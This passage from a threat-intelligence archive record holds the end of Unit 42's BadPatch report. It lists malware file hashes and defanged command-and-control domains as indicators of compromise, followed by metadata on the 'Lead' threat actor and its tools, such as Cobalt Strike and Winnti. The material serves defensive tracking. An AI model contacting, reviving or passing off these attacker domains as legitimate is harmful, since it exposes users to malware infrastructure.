047\r\nade725bed78f8a8f0c9a612ee22ea716e3caeacbe16726f9726b39d74e5f3c18\r\na94e82793f458b81707e00
5ba1298022a6b7ca0c07869884750d121a06401689\r\n3466d46a970b77cd14cf5c6c8587f522c9b823c8b28abf87a66b07e32041e5c1\r\nd906118fb36a0cc4e83121d4d606ad685645252e8e0791f793057499d8751bf0\r\n9a8acd988089e7f9dd04f971374f766db519e854d42e8052b0d98b4c9c6b67e4\r\n122f4d69497a162a942d8f400dabbe93ae0a326a022886bf6c9c45d23c299f96\r\nce98ab10089a9ef089941e48fe4cdf1af5c8a3df358f870d933668bbfb2f330e\r\na713f5c0089a5ef9b2da40fa8cfe06aad73cc836f337c772b1c7d30d70a6c5ed\r\n7fd71102743bf9212b96368597be396a1a22a49a1ec011f1c607533bdefc94bb\r\n46f3afae22e83344e4311482a9987ed851b2de282e8127f64d5901ac945713c0\r\na7c30a18a3840a97c1ce0130b55ef3f514952233dfcc8662a9e66c6029f95ba9\r\nhttps://unit42.paloaltonetworks.com/unit42-badpatch/\r\nPage 14 of 16\n\n86ede9ee62785fb11f4c6c95937d6d5bc6bb16c0d3b90ffeeab719b59f7d4e61\r\n30282a807c2ee27b0d1dda310e41487f5018bc5fc5df8af6c13d08df34f2b6df\r\nf36048ea70f70c4adde2d93819e7aa8652ab2761e598cafb1ea871b6730dbad3\r\ncf53fc8c9ce4e5797cc5ac6f71d4cbc0f2b15f2ed43f38048a5273f40bc09876\r\n8f82649ca0e9d1d48ec58a9e2e8431ddda0dc62db1a6d2cd9ec29afa7d59abc3\r\n358b0d6fc23b4984b51deb81ce89c110582e1730bd1eb163f633e1ed9e3388ee\r\n89bb38d54a80b460ea2744b7c5af02a1823939b55990ccd31c06d7ef040d29f3\r\n4a2ef9663f0d5fdfa551e3d31af6dbcffdc78ea02c0fb963b5486daee78421bc\r\n27752bbb01abc6abf50e1da3a59fefcce59618016619d68690e71ad9d4a3c247\r\nfc7558abd0b196a2c070db98268ed00dff186d609e23a93c03640dcc478db2eb\r\n46dd5deda642d4a8cf628d865483e82279cce2846106b830d45b64e1e19727dd\r\n5c47ed83e47f1bdde8c1ebc3d6193fef190c3934fb2239e84950ae5c073eb808\r\ncc8020c36156c7e5c8cfbbb32bc8d7f03536510f4e3b38b22e0abdb9ad90c90e\r\n39b825e400ea17215d6efc5ae425759bbfd3cd8569451680fbf782cfedbec0c5\r\n050610cfb3d3100841685826273546c829335a5f4e2e4260461b88367ad9502c\r\n08b32da8995ae094bfb703d7d975c3816cf04c075c32281e51158164d76cd655\r\n24fe39572ee425e30c018947a1422342479a3d664d1a8d2ab28cef656394073a\r\n1a65e43afaaff90b4124cbef21fadc319f10fba4843d09837219400b0dbcc285\r\n087941d80baca00501739abf0b8450dce723733ea8866
589fa9779481e7a6cfb\r\n285998bce9692e46652529685775aa05e3a5cb93ee4e65d021d2231256e92813\r\nc9c4263ac3287aa48d8cf03fdbb32a179cfd8c08d1c1a39696d8c932603e8df9\r\nbc8b240c89304c12dce75076f9fcc2859f48ec01347f9cc0a4cb9fbcb77ed089\r\n2349d745d84db772d97c599e6150ff4585a69d915deb6d6e6601e412651164f3\r\n2941f75da0574c21e4772f015ef38bb623dd4d0c81c263523d431b0114dd847e\r\n69424f5e0bd974271f367fae04179de4efe233d56ad81840a3c3936eaa244502\r\na793a401277b307c3b056a725672d81b71492cb564d6db2445a9c30724f61d72\r\n68ba2fa76ef3b3c905f26dae3c75a6b5e165b4246cb4f574c07ad70013b265ae\r\nb2d203b927507176606a6616ba8b8729050ecaff0790a9deb37df32caab7d613\r\n2c64a3d6b896ee1b58b9cf55531b7256de45025d60b1f4be764b385de087b52f\r\na1a5abab16c9de1c69c4a7e731c0f13c9bb8ce90dab15546807cae039c7f9385\r\nece76fdf7e33d05a757ef5ed020140d9367c7319022a889923bbfacccb58f4d7\r\n106deff16a93c4a4624fe96e3274e1432921c56d5a430834775e5b98861c00ea\r\nAppendix 2 – IOCs\r\nPal4u[.]net\r\nPal2me[.]net\r\nPay2earn[.]net\r\nShop8d[.]net\r\nTs4shope[.]net\r\npal4news[.]net\r\nhttps://unit42.paloaltonetworks.com/unit42-badpatch/\r\nPage 15 of 16\n\nads4market[.]net\r\nwp.piedslibres[.]com (hijacked legitimate site)\r\nSource: https://unit42.paloaltonetworks.com/unit42-badpatch/\r\nhttps://unit42.paloaltonetworks.com/unit42-badpatch/\r\nPage 16 of 16",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"references": [
		"https://unit42.paloaltonetworks.com/unit42-badpatch/"
	],
	"report_names": [
		"unit42-badpatch"
	],
	"threat_actors": [
		{
			"id": "d90307b6-14a9-4d0b-9156-89e453d6eb13",
			"created_at": "2022-10-25T16:07:23.773944Z",
			"updated_at": "2026-04-10T02:00:04.746188Z",
			"deleted_at": null,
			"main_name": "Lead",
			"aliases": [
				"Casper",
				"TG-3279"
			],
			"source_name": "ETDA:Lead",
			"tools": [
				"Agentemis",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"RbDoor",
				"RibDoor",
				"Winnti",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775439054,
	"ts_updated_at": 1775791431,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/236ea5241550bfc164e1d4a70df418046bcb5dc9.pdf",
		"text": "https://archive.orkl.eu/236ea5241550bfc164e1d4a70df418046bcb5dc9.txt",
		"img": "https://archive.orkl.eu/236ea5241550bfc164e1d4a70df418046bcb5dc9.jpg"
	}
}